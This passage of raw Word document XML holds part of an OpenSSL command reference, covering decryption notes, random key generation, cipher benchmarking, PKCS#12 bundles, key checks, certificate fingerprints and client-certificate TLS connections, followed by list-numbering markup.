        </w:rPr>
        <w:t>Silent success</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Successful decryption completes without output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6452C3CF" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Wrong password</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Incorrect password produces "bad decrypt" error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562EC399" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm match</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Encryption and decryption algorithms must match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12B7E5" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Salt automatic</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Salt is stored in encrypted file and used automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825BAEF" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Decrypt previously encrypted files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A814E7F" w14:textId="54AA2C67" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Generate random data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAD38BA"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rand -hex 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69660232" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096F3513"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a3f5d8e9c2b7f4a6e1d3c8b5f2a9e6c4d7b0a3f5d8e9c2b7f4a6e1d3c8b5f2a9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53C584" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD017D" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rand</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: OpenSSL random number generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BEFC84" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-hex</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Output in hexadecimal format (human-readable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA2133" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Generate 32 bytes (256 bits) of random data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0308AC26" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>256-bit output</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: 64 hexadecimal characters (2 chars per byte)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0E2C7" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cryptographically secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Uses strong random number generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8D63E" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Other formats</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Use -base64 for Base64 output, no flag for binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCFF34B" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common uses</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: API keys, session tokens, encryption keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B57E3A" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entropy source</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Uses system entropy for randomness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B86C2E" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Different sizes</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Use any number for different byte counts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621B1D3D" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Create random passwords or cryptographic keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DA92B" w14:textId="5181A149" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Test cipher performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698FA1B2"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speed aes-256-cbc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B2A04" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Benchmark encryption performance on system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7BB0F" w14:textId="59266759" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Create PKCS#12 bundle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176025F6"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pkcs12 -export -out certificate.p12 -inkey private.key -in certificate.crt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9D1D57" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Package certificate and key for Windows/Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B7DAD" w14:textId="197A3E18" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Check private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38914557"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rsa -in private.key -check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381DFF3C" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Validate private key integrity and format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D57876" w14:textId="0F1BB111" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Get certificate fingerprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B34A4"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x509 -noout -fingerprint -sha256 -inform pem -in certificate.crt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029F2F1B" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Generate certificate fingerprint for verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEC2C7" w14:textId="084DB079" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Connect with client certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE306F8" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A643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A6436C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>openssl s_client -connect server:443 -cert client.crt -key client.key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F04D4" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Test mutual TLS authentication with client certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35987736" w14:textId="77777777" w:rsidR="001D111D" w:rsidRPr="0017552F" w:rsidRDefault="001D111D" w:rsidP="0017552F"/>
    <w:sectPr w:rsidR="001D111D" w:rsidRPr="0017552F" w:rsidSect="00740027">
      <w:pgSz w:w="18720" w:h="1872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4F1"/>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4A94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4FE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44603"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DCC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332FE"/>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4423E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="185CE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27B68C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04C2C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2C43936"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F4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838D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C5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4259A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="807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57B0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85EE7D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3A6389E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="823476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40F5D68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61B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24041"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7882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96B03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="417A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1766F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A45CCF24"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1365" w:hanging="885"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1485" w:hanging="885"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1605" w:hanging="885"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2040" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2640" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3120" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="053867F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F74C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F6113"/>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5DD13A8"/>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005290"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2568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2274D4"/>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2563FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2570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341B14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAC02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6692671"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBC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C13C83"/>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C27B58"/>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02AD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7D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F26F3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA2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4F00E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8DA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B67201"/>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BF384E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB929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8CF115F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FB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284110"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7ECE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4D5F2D"/>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6566C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E2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702E26"/>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AE826C7"/>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46BAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4F4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601B66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1E6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93341C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE847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BAE3575"/>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CA5332"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6F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2E61E2"/>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4B39A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C1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651B34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C14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B63FF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EC8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DDE2CA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8E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4E092D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C0A687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0E52021E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6A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CE0B74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E2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174AF9"/>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4C37FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB9C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616C5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2BE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88522A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19E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9F2733"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A45CCF24"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1365" w:hanging="885"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1485" w:hanging="885"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1605" w:hanging="885"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2040" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2640" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3120" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="54" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11AE6AAD"/>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FD46E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2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7C5CF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BD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C82B5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BEF2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554A10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F48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37F1ED0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB1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E445C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="938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4E15B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5E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6060B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27C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48128D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8B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5876FE"/>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772E3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08B8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883E56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47E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0330AF"/>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B13580"/>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F264E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB68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C44BB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04B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E537E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5834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FC31AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF9A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2259EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5C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A04D7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="831C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D8343F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CD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25289A"/>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B244D7"/>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EF086B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="500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B541A5C"/>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EC6E9F"/>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7F6889"/>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F801A7"/>
